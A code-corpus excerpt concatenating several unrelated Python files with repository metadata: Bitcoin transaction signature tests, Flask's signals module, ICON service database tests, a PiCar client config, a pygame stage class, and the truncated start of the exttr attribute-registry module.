                "ynbVb2GjiCarC+8Assz2Y/nS/I/DCNdYSax2DNPhkEEhlxAKTpoDLnAIOex4Q"
                "bYwZFtPO+ZqkMaVtJT5pJW2sCe8SKxqYaBiny2JFMvBiwdH4ciCEhhxcMpHM/"
                "+9OxodEEEjSRV0kA+CHCPwfVWAC8bbNg/mS0IUJf5l0qwiiiDjweJb7qwjzlJ"
                "XhX6b61u2/sedU41+hx4RMQfMioYY9RiE1Ou/////wFAQg8AAAAAABl2qRSuV"
                "rTbE1VNMhxALbOWEYeu0bvtW4isAAAAAA=="
            ),
            ( # 3c9018e8d5615c306d72397f8f5eef44308c98fb576a88e030c25456b4f3a7ac
              # input of
              # 837dea37ddc8b1e3ce646f1a656e79bbd8cc7f558ac56a169626d649ebe2a3ba
                "AQAAAAGJYyhI+ZcikVcnxcddqNstvxlDQqBCmCj2b/iPqyr31gAAAACLSDBFA"
                "iEAq7yKc/4gVEgL2j8ygdotDFHihBORq9TAn0+QiiA0wY0CIFvJ5NaOr7kY8+"
                "lmIzhkekQZwN4aZQq4mD8dIW4qMdjjAUEEb1XXre/2ARx+rClP5UDFeDC+gOk"
                "1XIOGnJJgpLi/R2ema6y9cLgE3GPVvusUGAKSrX87CDNysdAtejfdl/9cnv//"
                "//8BQEIPAAAAAAAXqRT4FbA22bu85enyoAq9G/PckelVEIcAAAAA"
            )
        ]
        # Decode every fixture and index it by transaction hash so inputs
        # can be resolved against their source transactions.
        TX_LIST = [Tx.from_hex(b2h(binascii.a2b_base64(b64.encode("utf8")))) for b64 in TX_B64_LIST]
        TX_DB = dict((tx.hash(), tx) for tx in TX_LIST)
        for h in ["315ac7d4c26d69668129cc352851d9389b4a6868f1509c6c8b66bead11e2619f",
                  "dbf38261224ebff0c455c405e2435cfc69adb6b8a42d7b10674d9a4eb0464dca",
                  "de744408e4198c0a39310c8106d1830206e8d8a5392bcf715c9b5ec97d784edd",
                  "485716e53b422aca0fe5b1ded21360695ce5f49255d80e10db56458ed6962ff3",
                  "837dea37ddc8b1e3ce646f1a656e79bbd8cc7f558ac56a169626d649ebe2a3ba"]:
            tx = TX_DB.get(h2b_rev(h))
            self.assertNotEqual(tx, None)
            tx.unspents_from_db(TX_DB)
            # Every input of each transaction must validate.
            for idx, tx_in in enumerate(tx.txs_in):
                self.assertTrue(tx.is_signature_ok(tx_in_idx=idx))
def tx_to_b64(tx_hex):
    """Print a raw transaction as quoted base64 lines.

    Helper used to regenerate the literal base64 data embedded above:
    parses *tx_hex*, serializes it, and prints the bytes in 45-byte
    base64 chunks ready to paste into a Python source file.
    """
    import io
    buffer = io.BytesIO()
    Tx.from_hex(tx_hex).stream(buffer)
    raw = buffer.getvalue()
    for offset in range(0, len(raw), 45):
        chunk = raw[offset:offset + 45]
        # b2a_base64 always appends a newline; strip it before quoting.
        encoded = binascii.b2a_base64(chunk).decode("utf8").rstrip("\n")
        print('"%s"' % encoded)
# Allow running this test module directly (outside a test runner).
if __name__ == "__main__":
    unittest.main()
| 56.735577 | 108 | 0.708669 |
ac71b8ce4a1073f64368cfa634cda5c719421bc7 | 2,140 | py | Python | flask/signals.py | prasenjit/ffbird | 057873a500738383612ed21e93348dfb9ee19af2 | [
"Apache-2.0"
] | 1 | 2016-03-24T22:33:59.000Z | 2016-03-24T22:33:59.000Z | flask/signals.py | prasenjit/ffbird | 057873a500738383612ed21e93348dfb9ee19af2 | [
"Apache-2.0"
] | null | null | null | flask/signals.py | prasenjit/ffbird | 057873a500738383612ed21e93348dfb9ee19af2 | [
"Apache-2.0"
] | 1 | 2020-10-01T16:36:12.000Z | 2020-10-01T16:36:12.000Z | # -*- coding: utf-8 -*-
"""
flask.signals
~~~~~~~~~~~~~
Implements signals based on blinker if available, otherwise
falls silently back to a noop
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
# True only when the optional ``blinker`` dependency is importable;
# consumers may check this flag to learn whether real signal delivery
# (connect/receivers) is available.
signals_available = False
try:
    from blinker import Namespace
    signals_available = True
except ImportError:
    class Namespace(object):
        # Fallback namespace used when blinker is missing: hands out
        # _FakeSignal objects whose send() is a no-op, so importing code
        # keeps working without the library installed.
        def signal(self, name, doc=None):
            return _FakeSignal(name, doc)
class _FakeSignal(object):
    """Stand-in used when blinker is unavailable.

    Presents the same interface as a blinker signal: ``send`` silently
    ignores its arguments and returns ``None``, while every other
    operation (connecting, inspecting receivers, ...) raises a
    ``RuntimeError`` explaining that blinker is missing.
    """

    def __init__(self, name, doc=None):
        self.name = name
        self.__doc__ = doc

    def send(self, *args, **kwargs):
        # Sending to zero receivers is a harmless no-op.
        return None

    def _fail(self, *args, **kwargs):
        raise RuntimeError('signalling support is unavailable '
                           'because the blinker library is '
                           'not installed.')

    # Everything except send() needs real receiver machinery, so it fails.
    connect = _fail
    disconnect = _fail
    has_receivers_for = _fail
    receivers_for = _fail
    temporarily_connected_to = _fail
    connected_to = _fail
    del _fail
# The namespace for code signals. If you are not flask code, do
# not put signals in here. Create your own namespace instead.
_signals = Namespace()

# Core signals. For usage examples grep the sourcecode or consult
# the API documentation in docs/api.rst as well as docs/signals.rst.
# With blinker missing these are _FakeSignal no-ops (see above).
template_rendered = _signals.signal('template-rendered')
request_started = _signals.signal('request-started')
request_finished = _signals.signal('request-finished')
request_tearing_down = _signals.signal('request-tearing-down')
got_request_exception = _signals.signal('got-request-exception')
appcontext_tearing_down = _signals.signal('appcontext-tearing-down')
appcontext_pushed = _signals.signal('appcontext-pushed')
appcontext_popped = _signals.signal('appcontext-popped')
message_flashed = _signals.signal('message-flashed')
64108fb64d66b63598ce58eddfb7c30935ee4c97 | 11,859 | py | Python | tests/legacy_unittest/database/test_db_db.py | bayeshack2016/icon-service | 36cab484d2e41548d7f2f74526f127ee3a4423fc | [
"Apache-2.0"
] | 52 | 2018-08-24T02:28:43.000Z | 2021-07-06T04:44:22.000Z | tests/legacy_unittest/database/test_db_db.py | bayeshack2016/icon-service | 36cab484d2e41548d7f2f74526f127ee3a4423fc | [
"Apache-2.0"
] | 62 | 2018-09-17T06:59:16.000Z | 2021-12-15T06:02:51.000Z | tests/legacy_unittest/database/test_db_db.py | bayeshack2016/icon-service | 36cab484d2e41548d7f2f74526f127ee3a4423fc | [
"Apache-2.0"
] | 35 | 2018-09-14T02:42:10.000Z | 2022-02-05T10:34:46.000Z | # -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from unittest.mock import patch
from iconservice.base.address import Address, AddressPrefix
from iconservice.base.exception import DatabaseException, InvalidParamsException
from iconservice.database.batch import BlockBatch, TransactionBatch, TransactionBatchValue, BlockBatchValue
from iconservice.database.db import ContextDatabase, MetaContextDatabase
from iconservice.database.db import KeyValueDatabase
from iconservice.database.wal import StateWAL
from iconservice.icon_constant import Revision
from iconservice.iconscore.db import IconScoreDatabase
from iconservice.iconscore.icon_score_context import IconScoreContextType, IconScoreContext
from iconservice.iconscore.icon_score_context import IconScoreFuncType
from tests import rmtree
class TestKeyValueDatabase(unittest.TestCase):
    """Exercises the raw KeyValueDatabase wrapper against a scratch directory."""

    def setUp(self):
        # Recreate a clean on-disk database for every test.
        self.state_db_root_path = 'state_db'
        rmtree(self.state_db_root_path)
        os.mkdir(self.state_db_root_path)
        self.db = KeyValueDatabase.from_path(self.state_db_root_path, True)

    def tearDown(self):
        self.db.close()
        rmtree(self.state_db_root_path)

    def test_get_and_put(self):
        self.db.put(b'key0', b'value0')
        self.assertEqual(b'value0', self.db.get(b'key0'))
        # A key that was never written must read back as None.
        self.assertIsNone(self.db.get(b'key1'))

    def test_write_batch(self):
        batch = {
            b'key0': BlockBatchValue(b'value0', True, [-1]),
            b'key1': BlockBatchValue(b'value1', True, [-1]),
        }
        self.db.write_batch(StateWAL(batch))
        self.assertEqual(b'value1', self.db.get(b'key1'))
        self.assertEqual(b'value0', self.db.get(b'key0'))
class TestContextDatabaseOnWriteMode(unittest.TestCase):
    """Exercises ContextDatabase/MetaContextDatabase under a writable INVOKE context."""

    def setUp(self):
        # Fresh scratch directory per test; ContextDatabase persists to disk.
        state_db_root_path = 'state_db'
        self.state_db_root_path = state_db_root_path
        rmtree(state_db_root_path)
        os.mkdir(state_db_root_path)
        address = Address.from_data(AddressPrefix.CONTRACT, b'score')
        context = IconScoreContext(IconScoreContextType.INVOKE)
        context.block_batch = BlockBatch()
        context.tx_batch = TransactionBatch()
        db_path = os.path.join(state_db_root_path, 'db')
        context_db = ContextDatabase.from_path(db_path, True)
        # MetaContextDatabase wraps the same underlying key-value store.
        meta_context_db = MetaContextDatabase(context_db.key_value_db)
        self.context_db = context_db
        self.meta_context_db = meta_context_db
        self.address = address
        self.context = context

    def tearDown(self):
        # Restore WRITABLE so close() succeeds even after read-only tests.
        self.context.func_type = IconScoreFuncType.WRITABLE
        self.context_db.close(self.context)
        rmtree(self.state_db_root_path)

    def test_put_and_get(self):
        """A value written under an address-body key reads back unchanged."""
        context = self.context
        address = Address.from_data(AddressPrefix.CONTRACT, b'score')
        value = 100
        self.context_db._put(context, address.body, value.to_bytes(32, 'big'), True)
        value = self.context_db.get(context, address.body)
        self.assertEqual(100, int.from_bytes(value, 'big'))

    def test_put(self):
        """WritableDatabase supports put()
        """
        context = self.context
        self.context_db._put(context, b'key0', b'value0', True)
        value = self.context_db.get(context, b'key0')
        self.assertEqual(b'value0', value)
        # Writes are staged in the transaction batch, not flushed yet.
        batch = self.context.tx_batch
        self.assertEqual(TransactionBatchValue(b'value0', True), batch[b'key0'])
        self.context_db._put(context, b'key0', b'value1', True)
        self.context_db._put(context, b'key1', b'value1', True)
        self.assertEqual(len(batch), 2)
        self.assertEqual(batch[b'key0'], TransactionBatchValue(b'value1', True))
        self.assertEqual(batch[b'key1'], TransactionBatchValue(b'value1', True))
        # Same operations with the boolean flag False — the flag is recorded
        # in the batch value (presumably state-root inclusion; confirm in
        # ContextDatabase._put).
        self.context_db._put(context, b'key2', b'value2', False)
        self.context_db._put(context, b'key3', b'value3', False)
        value2 = self.context_db.get(context, b'key2')
        value3 = self.context_db.get(context, b'key3')
        self.assertEqual(b'value2', value2)
        self.assertEqual(b'value3', value3)
        self.assertEqual(len(batch), 4)
        self.assertEqual(batch[b'key2'], TransactionBatchValue(b'value2', False))
        self.assertEqual(batch[b'key3'], TransactionBatchValue(b'value3', False))
        # overwrite: re-writing/deleting a flag-False entry with flag True raises
        self.assertRaises(DatabaseException, self.context_db._put, context, b'key3', b'value3', True)
        self.assertRaises(DatabaseException, self.context_db._delete, context, b'key3', True)

    def test_put_on_readonly_exception(self):
        # Writing through a READONLY context must be rejected.
        context = self.context
        context.func_type = IconScoreFuncType.READONLY
        with self.assertRaises(DatabaseException):
            self.context_db._put(context, b'key1', b'value1', True)

    def test_write_batch(self):
        context = self.context
        data = {
            b'key0': BlockBatchValue(b'value0', True, [-1]),
            b'key1': BlockBatchValue(b'value1', True, [-1])
        }
        db = self.context_db
        db.write_batch(context, StateWAL(data))
        self.assertEqual(b'value1', db.get(context, b'key1'))
        self.assertEqual(b'value0', db.get(context, b'key0'))

    def test_write_batch_invalid_value_format(self):
        # Raw values (bytes / None / str) are rejected; every entry must be
        # a BlockBatchValue.
        context = self.context
        data = {
            b'key0': b'value0',
        }
        db = self.context_db
        with self.assertRaises(InvalidParamsException):
            db.write_batch(context, StateWAL(data))
        data = {
            b'key0': None,
        }
        db = self.context_db
        with self.assertRaises(InvalidParamsException):
            db.write_batch(context, StateWAL(data))
        data = {
            b'key0': "",
        }
        db = self.context_db
        with self.assertRaises(InvalidParamsException):
            db.write_batch(context, StateWAL(data))

    def test_write_batch_on_readonly_exception(self):
        db = self.context_db
        context = self.context
        context.func_type = IconScoreFuncType.READONLY
        with self.assertRaises(DatabaseException):
            data = {
                b'key0': b'value0',
                b'key1': b'value1'
            }
            db.write_batch(context, data.items())

    @unittest.skip('context is never none')
    def test_none_context(self):
        context = None
        db = self.context_db
        db._put(context, b'key0', b'value0', True)
        self.assertEqual(b'value0', db.get(context, b'key0'))
        db.delete(context, b'key0')
        self.assertIsNone(db.get(context, b'key0'))
        with self.assertRaises(TypeError):
            db._put(context, b'key1', None, True)

    def test_delete(self):
        context = self.context
        db = self.context_db
        tx_batch = context.tx_batch
        block_batch = context.block_batch
        db._put(context, b'key0', b'value0', True)
        db._put(context, b'key1', b'value1', True)
        self.assertEqual(b'value0', db.get(context, b'key0'))
        self.assertEqual(TransactionBatchValue(b'value0', True), tx_batch[b'key0'])
        # Flush: tx batch -> block batch -> state DB, then clear both batches.
        block_batch.update(tx_batch)
        state_wal = StateWAL(block_batch)
        db.write_batch(context, state_wal)
        tx_batch.clear()
        block_batch.clear()
        self.assertEqual(0, len(tx_batch))
        self.assertEqual(b'value0', db.get(context, b'key0'))
        db._delete(context, b'key0', True)
        db._delete(context, b'key1', False)
        self.assertEqual(None, db.get(context, b'key0'))
        self.assertEqual(None, db.get(context, b'key1'))
        # Deletions are staged as None values in the tx batch.
        self.assertEqual(TransactionBatchValue(None, True), tx_batch[b'key0'])
        self.assertEqual(TransactionBatchValue(None, False), tx_batch[b'key1'])
        block_batch.update(tx_batch)
        # NOTE(review): the same StateWAL instance is reused after the block
        # batch was cleared and refilled — presumably StateWAL iterates the
        # batch lazily; confirm.
        db.write_batch(context, state_wal)
        tx_batch.clear()
        block_batch.clear()
        self.assertEqual(0, len(tx_batch))
        self.assertIsNone(db.get(context, b'key0'))
        self.assertIsNone(db.get(context, b'key1'))

    def test_delete_on_readonly_exception(self):
        context = self.context
        db = self.context_db
        tx_batch = context.tx_batch
        db._put(context, b'key0', b'value0', True)
        self.assertEqual(b'value0', db.get(context, b'key0'))
        self.assertEqual(TransactionBatchValue(b'value0', True), tx_batch[b'key0'])
        # Deleting through a READONLY context must be rejected...
        context.func_type = IconScoreFuncType.READONLY
        with self.assertRaises(DatabaseException):
            db._delete(context, b'key0', True)
        # ...and succeed again once the context is WRITABLE.
        context.func_type = IconScoreFuncType.WRITABLE
        db._delete(context, b'key0', True)
        self.assertIsNone(db.get(context, b'key0'))
        self.assertEqual(TransactionBatchValue(None, True), tx_batch[b'key0'])

    def test_put_and_delete_of_meta_context_db(self):
        # ContextDatabase stages batch values with flag True,
        # MetaContextDatabase with flag False — for both puts and deletes.
        context = self.context
        context_db = self.context_db
        meta_context_db = self.meta_context_db
        context_db.put(context, b'c_key', b'value0')
        meta_context_db.put(context, b'm_key', b'value0')
        self.assertEqual(TransactionBatchValue(b'value0', True), context.tx_batch[b'c_key'])
        self.assertEqual(TransactionBatchValue(b'value0', False), context.tx_batch[b'm_key'])
        context_db.delete(context, b'c_key')
        meta_context_db.delete(context, b'm_key')
        self.assertEqual(TransactionBatchValue(None, True), context.tx_batch[b'c_key'])
        self.assertEqual(TransactionBatchValue(None, False), context.tx_batch[b'm_key'])
class TestIconScoreDatabase(unittest.TestCase):
    """Exercises the SCORE-facing IconScoreDatabase over a real ContextDatabase."""

    def setUp(self):
        # Fresh on-disk state DB and a contract-address-scoped database.
        state_db_root_path = 'state_db'
        self.state_db_root_path = state_db_root_path
        rmtree(state_db_root_path)
        os.mkdir(state_db_root_path)
        address = Address.from_data(AddressPrefix.CONTRACT, b'0')
        db_path = os.path.join(state_db_root_path, 'db')
        context_db = ContextDatabase.from_path(db_path, True)
        self.db = IconScoreDatabase(address, context_db=context_db)
        self.address = address

    def tearDown(self):
        self.db.close()
        rmtree(self.state_db_root_path)

    def test_address(self):
        self.assertEqual(self.address, self.db.address)

    @patch('iconservice.iconscore.context.context.ContextGetter._context')
    def test_put_and_get(self, context):
        # The patched context stands in for the global execution context.
        context.current_address = self.address
        context.revision = Revision.USE_RLP.value - 1
        context.type = IconScoreContextType.DIRECT
        context.readonly = False
        db = self.db
        # Nothing written yet: all keys are empty.
        for i in range(3):
            key = f"key{i}".encode()
            self.assertIsNone(db.get(key))
        # Write under the pre-RLP revision and read back.
        for i in range(3):
            key = f"key{i}".encode()
            value = i.to_bytes(20, "big")
            self.assertIsNone(db.get(key))
            db.put(key, value)
            self.assertEqual(value, db.get(key))
        # Bump to the RLP revision: old values stay readable and can be
        # overwritten under the new key encoding.
        context.revision = Revision.USE_RLP.value
        for i in range(3):
            key = f"key{i}".encode()
            old_value = i.to_bytes(20, "big")
            new_value = i.to_bytes(30, "big")
            self.assertNotEqual(old_value, new_value)
            self.assertEqual(old_value, db.get(key))
            db.put(key, new_value)
            self.assertEqual(new_value, db.get(key))
| 35.612613 | 107 | 0.656295 |
3607aa7d70a572b3800e8c0c5b62cd6f1936a230 | 818 | py | Python | client/tcp/config.py | maxschwe/PiCar | 81d83cd0f8a32d4c0faf8c36a13e09da732244d3 | [
"MIT"
] | null | null | null | client/tcp/config.py | maxschwe/PiCar | 81d83cd0f8a32d4c0faf8c36a13e09da732244d3 | [
"MIT"
] | null | null | null | client/tcp/config.py | maxschwe/PiCar | 81d83cd0f8a32d4c0faf8c36a13e09da732244d3 | [
"MIT"
] | null | null | null | import os
import logging
class Config:
    """Static client-side configuration: TCP connection settings and sync paths."""
    # ==================================================================
    # SERVER configuration
    # ==================================================================
    SERVER = "192.168.178.75"  # SERVER = "127.0.0.1"
    # NOTE(review): this is the tuple (4000, 10), not a single int —
    # presumably (port, backlog or retry count)? Confirm against the
    # socket code that consumes it.
    PORT = 4000, 10
    DELAY_RECONNECTING = 3  # seconds between reconnect attempts — TODO confirm units
    TIMEOUT_RECONNECTING = 60  # give up reconnecting after this long — TODO confirm units
    DELAY_RETRY_CONNECTING = 2
    ENCODING = "utf-8"  # text encoding for protocol messages
    MSG_LENGTH = 1024  # presumably bytes per socket recv — confirm at call site
    # ==================================================================
    # Sync configuration
    # ==================================================================
    USE_PC = False  # presumably selects PATH_PC over PATH_LAPTOP — confirm in sync code
    PATH_PC = "/home/max/Schreibtisch/Python/PiCar/pi"
    PATH_LAPTOP = "C:/Users/Max/Desktop/Daten/Python/PiCar/pi"
    PATH_DATA = "data"
    PATH_PI = "/home/pi/PiCar"  # "C:/Users/Max/Desktop/Test"
| 29.214286 | 72 | 0.419315 |
0e859be456255546e117081ec4f5e0440976f68a | 251 | py | Python | python/pycomposer/pycomposer/__init__.py | zarzen/split-annotations | 6a8fd56eb4a39c7603634e574dce26cbdd57e162 | [
"BSD-3-Clause"
] | 53 | 2019-08-13T00:59:29.000Z | 2022-03-21T21:40:05.000Z | python/pycomposer/pycomposer/__init__.py | zarzen/split-annotations | 6a8fd56eb4a39c7603634e574dce26cbdd57e162 | [
"BSD-3-Clause"
] | 2 | 2019-10-30T17:39:05.000Z | 2020-12-24T12:58:57.000Z | python/pycomposer/pycomposer/__init__.py | zarzen/split-annotations | 6a8fd56eb4a39c7603634e574dce26cbdd57e162 | [
"BSD-3-Clause"
] | 5 | 2019-08-13T17:33:32.000Z | 2022-03-02T20:17:21.000Z |
from .composer import sa, evaluate, mut
from .split_types import SplitType, Broadcast
from .vm.driver import STOP_ITERATION
# Import the generics.
from .split_types import A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z
| 31.375 | 101 | 0.661355 |
0cc5a7bf38b26f4313ea4085e6da39c5cee00664 | 6,340 | py | Python | game/class_/stage.py | Michael78912/SMNW | da5a7278cf1a14e2af2e9c291a5f53ba21f265e2 | [
"MIT"
] | 1 | 2018-12-11T23:42:57.000Z | 2018-12-11T23:42:57.000Z | game/class_/stage.py | Michael78912/SMNW | da5a7278cf1a14e2af2e9c291a5f53ba21f265e2 | [
"MIT"
] | null | null | null | game/class_/stage.py | Michael78912/SMNW | da5a7278cf1a14e2af2e9c291a5f53ba21f265e2 | [
"MIT"
] | null | null | null | from threading import Thread
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION, KEYDOWN
import pygame as pg
import os
from . import screen
# Map-icon colors (RGB) keyed to stage state.
WHITE = (255, 255, 255)  # unbeaten
GRAY = (211, 211, 211)  # beaten
TEAL = (0, 128, 128)  # peaceful
YELLOW = (128, 128, 0)  # hover-highlight box color
BLACK = (0, 0, 0)  # hover-label text color
# Pixel size (width, height) of a stage icon on the map.
STAGE_SIZE = (15, 15)
class Stage:
    """A stage class that can hold several screens. Defeat a stage to move on."""
    # NOTE(review): these are mutable/shared class-level defaults; in
    # particular game_state is one dict shared by every Stage instance
    # until init() rebinds it per instance.
    unlocked = False
    beaten = False
    rect_padding = 8  # pixels of highlight-box padding around the icon
    game_state = {}

    def __init__(
        self,
        name,
        # name to be used by the game
        position_on_map,
        # (x, y) cartesian system
        all_screens,
        # list\tuple of all screens in stage
        boss_screen,
        # the screen of the boss (NOTE(review): currently unused — never stored)
        terrain,
        # the terrain class
        comes_from,
        # stage that you beat to unlock it (first level is None, shouldn't
        # need to put None again)
        surface,
        # map that the stage must be drawn on
        peaceful=False,
        # peaceful stage is a shop or of the like
        has_icon=True,
        # False if level shows upon map already, or is secret
        links_to=None,
        # list\tuple of all stages it links to,
        decorations=(),
        # tuple of decorations to be drawn
    ):
        # The first stage has no prerequisite: substitute the always-beaten
        # null stage so draw_on_map() treats it as unlocked.
        if comes_from is None:
            comes_from = _NullStage
        self.position_on_map = position_on_map
        self.all_screens = all_screens
        self.comes_from = comes_from
        self.drawing_surface = surface
        self.peaceful = peaceful
        self.has_icon = has_icon
        self.links_to = links_to
        self.name = name
        self.terrain = terrain
        self.decorations = decorations
        # print(os.getcwd())
        # Sanity-check that the gameplay track exists on disk (opens and
        # immediately closes the file).
        with open(os.path.join(
                os.getcwd(), 'music', 'smnwgameplay.mp3'
        )):
            print('opened successfully')
        self.music = os.path.join('music', 'smnwgameplay.mp3')
        self.rect = pg.Rect(position_on_map, STAGE_SIZE)
        rect = self.rect
        left, top, width, height = rect.left, rect.top, rect.width, rect.height
        # Hit box used by check_hover(): the icon rect grown by rect_padding
        # on every side.
        self.box = pg.Rect(left - self.rect_padding, top - self.rect_padding,
                           width + (self.rect_padding * 2), height +
                           (self.rect_padding * 2)
                           )

    def draw_on_map(self):
        """Draw the stage onto the map surface."""
        surface = self.drawing_surface
        # White = unlocked (prerequisite beaten), gray = already beaten;
        # teal (peaceful) overrides either.
        if self.comes_from.beaten and self.has_icon:
            self.rect = pg.draw.rect(
                surface, WHITE, self.position_on_map + STAGE_SIZE)
        elif self.beaten and self.has_icon:
            self.rect = pg.draw.rect(
                surface, GRAY, self.position_on_map + STAGE_SIZE)
        if self.peaceful and self.has_icon:
            self.rect = pg.draw.rect(
                surface, TEAL, self.position_on_map + STAGE_SIZE)

    def check_hover(self, pos):
        """Check to see if the mouse is hovering over. If it is,
        display a box around the level, and its name.
        """
        # print(left, top, width, height)
        if self.box.collidepoint(*pos):
            box = self.box
            pg.draw.rect(self.drawing_surface, YELLOW, box, 1)
            fontobj = pg.font.Font(os.path.join(
                'data', 'MICHAEL`S FONT.ttf'), 20)
            fontobj.set_bold(True)
            surf = fontobj.render(self.name, True, BLACK)
            surfrect = surf.get_rect()
            # Center the label 40 px above the cursor.
            surfrect.center = pos[0], pos[1] - 40
            self.drawing_surface.blit(surf, surfrect)

    def start_music(self):
        """Stop old music, play new music."""
        if not self.peaceful:
            # keep the theme music if it is a peaceful screen.
            pg.mixer.music.fadeout(2000)
            print('howdy?')  # debug marker
            pg.mixer.music.load(self.music)
            pg.mixer.music.play(-1)

    def init(self, game_state):
        """Run the stage: bind the game state and start music in the background."""
        self.game_state = game_state
        if game_state['SETTINGS']['music']:
            # Fading/loading music blocks, so do it off the main loop.
            Thread(target=self.start_music).start()
        game_state['_STAGE_DATA'] = {
            'screen_number': 0,
            'screen': self.all_screens[0],
            'stage': self,
        }

    def update(self, events):
        """Update the stage, and everything related to it."""
        state = self.game_state
        # Lazily build the terrain image the first time it is needed.
        terrain_surf = self.terrain.built_image if self.terrain.built_image is not None else self.terrain.build()
        display = state['MAIN_DISPLAY_SURF']
        display.fill((0, 0, 0))
        current_screen: screen.Screen = self.all_screens[state['_STAGE_DATA']
                                                         ['screen_number']]
        display.blit(terrain_surf, (0, 0))
        current_screen.draw(state)
        letters = []
        for particle in state['PARTICLES']:
            particle.draw(display)
        for projectile in state['PROJECTILES']:
            projectile.draw(display)
        for event in events:
            check_quit(event)
            if event.type == MOUSEBUTTONDOWN:
                state['MOUSEDOWN'] = True
            elif event.type == MOUSEMOTION:
                # NOTE(review): clearing MOUSEDOWN on *motion* (rather than
                # MOUSEBUTTONUP) looks suspicious — confirm intended.
                state['MOUSEDOWN'] = False
            elif event.type == KEYDOWN:
                letters.append(event.unicode)
        if letters:
            pass
        # '~' opens the (not yet implemented) debug terminal.
        if '~' in letters:
            print('open terminal...')
def check_quit(event):
    """Quit pygame and exit the process when *event* is a QUIT event."""
    if event.type != QUIT:
        return
    pg.quit()
    raise SystemExit
class _NullStage(Stage):
    """Null-object prerequisite for the first stage.

    Used as ``comes_from`` when a Stage has no predecessor: it is always
    ``beaten`` (so the stage draws as unlocked) and carries no other state.
    """
    def __init__(self):
        pass
    position_on_map = None
    all_screens = None
    comes_from = None
    drawing_surface = None
    peaceful = None
    has_icon = None
    links_to = None
    beaten = True
# d = pg.Surface((100, 100))
# d.fill((255, 255, 255))
# s = Stage(
# "Test Stage 0.0",
# position_on_map=(18, 569),
# all_screens=[PeacefulScreen],
# boss_screen=None,
# surface=d,
# terrain=Terrain('dirt', 'flat'),
# comes_from=None,
# peaceful=True,
# )
# s.draw_on_map()
# s.check_hover((100, 100))
# pg.image.save(d, r'C:\Users\Michael\Desktop\test_images\howdy.png')
| 29.21659 | 113 | 0.56183 |
87bd2161c3759441a2b11704d56252e7e934b39b | 177 | py | Python | mmaction/core/__init__.py | sjtuytc/mmaction2 | 7c2fba5a15ca08b81b4581e453ef6b381e4b0a52 | [
"Apache-2.0"
] | 3 | 2020-11-04T13:26:28.000Z | 2020-11-17T07:40:34.000Z | mmaction/core/__init__.py | sjtuytc/mmaction2 | 7c2fba5a15ca08b81b4581e453ef6b381e4b0a52 | [
"Apache-2.0"
] | null | null | null | mmaction/core/__init__.py | sjtuytc/mmaction2 | 7c2fba5a15ca08b81b4581e453ef6b381e4b0a52 | [
"Apache-2.0"
] | 1 | 2020-11-06T07:02:55.000Z | 2020-11-06T07:02:55.000Z | from .dist_utils import * # noqa: F401, F403
from .evaluation import * # noqa: F401, F403
from .fp16 import * # noqa: F401, F403
from .optimizer import * # noqa: F401, F403
| 35.4 | 45 | 0.683616 |
e5f6954c3b57cf5889ed3101a0fe308477b4fd85 | 3,514 | py | Python | src/exttr/core.py | altendky/exttr | 60aa5d6e9f04631b8e86552620f2d9cd2a0a3a04 | [
"MIT"
] | 1 | 2019-05-03T18:36:00.000Z | 2019-05-03T18:36:00.000Z | src/exttr/core.py | altendky/exttr | 60aa5d6e9f04631b8e86552620f2d9cd2a0a3a04 | [
"MIT"
] | 10 | 2019-02-27T19:38:04.000Z | 2019-09-01T15:59:09.000Z | src/exttr/core.py | altendky/exttr | 60aa5d6e9f04631b8e86552620f2d9cd2a0a3a04 | [
"MIT"
] | 2 | 2019-04-24T12:19:47.000Z | 2019-05-03T18:36:04.000Z | import collections
import functools
import itertools
import uuid
import attr
import exttr._utility
# All keyword-argument names accepted by attr.ib(); used to separate the
# standard attrs keywords from plugin-registered "extra" keywords.
attr_ib_keywords = exttr._utility.get_parameter_names(attr.ib)

# Key under which exttr stores its extras inside an attribute's metadata.
metadata_name = 'exttr'
class UnknownKeywordError(Exception):
    """Raised when create_attribute() sees a keyword no registered plugin declares."""
    pass


class KeywordCollisionError(Exception):
    """Raised when a new keyword conflicts with an already-registered one."""
    pass


class AttrsCollisionError(Exception):
    """Raised when a plugin keyword shadows a built-in attr.ib() keyword."""
    pass
def get_all(cls, attribute):
    """Return the exttr metadata mapping stored on *attribute* of *cls*."""
    attrs_field = getattr(attr.fields(cls), attribute)
    return attrs_field.metadata[metadata_name]
def get(cls, attribute, extra):
    """Return the single *extra* value from *attribute*'s exttr metadata."""
    extras = get_all(cls=cls, attribute=attribute)
    return extras[extra]
@attr.s(frozen=True)
class Keyword(object):
    # A keyword that a plugin may register for use in create_attribute().
    name = attr.ib()
    # Optional stable identity, parsed from a string into uuid.UUID.
    # None means the keyword carries no cross-plugin identity.
    uuid = attr.ib(
        default=None,
        converter=lambda x: None if x is None else uuid.UUID(x),
    )
@attr.s
class Plugin(object):
    """A bundle of Keyword objects that can be registered with a Registry."""
    keywords = attr.ib(factory=list, converter=list)

    def register_keywords(self, *keywords):
        """Add each given keyword to this plugin."""
        self.keywords.extend(keywords)
@attr.s
class Registry(object):
    """Collects plugins and builds attr.ib() attributes that accept their extras."""
    plugins = attr.ib(factory=list, converter=list)

    def register_plugins(self, *plugins):
        """Add plugins after checking every keyword for collisions.

        Raises AttrsCollisionError when a keyword shadows a real attr.ib()
        keyword, and KeywordCollisionError when it conflicts with a keyword
        already in the registry.
        """
        for plugin in plugins:
            for keyword in plugin.keywords:
                if keyword.name in attr_ib_keywords:
                    raise AttrsCollisionError(keyword)
                for other_keyword in self.keywords():
                    # Same name+uuid, but no uuid to disambiguate by.
                    name_collision = (
                        (keyword == other_keyword)
                        and (keyword.uuid is None)
                    )
                    # Same uuid claimed under two different names.
                    # NOTE(review): when both uuids are None this also
                    # triggers for any two differently-named keywords —
                    # confirm that is intended.
                    uuid_collision = (
                        (keyword.uuid == other_keyword.uuid)
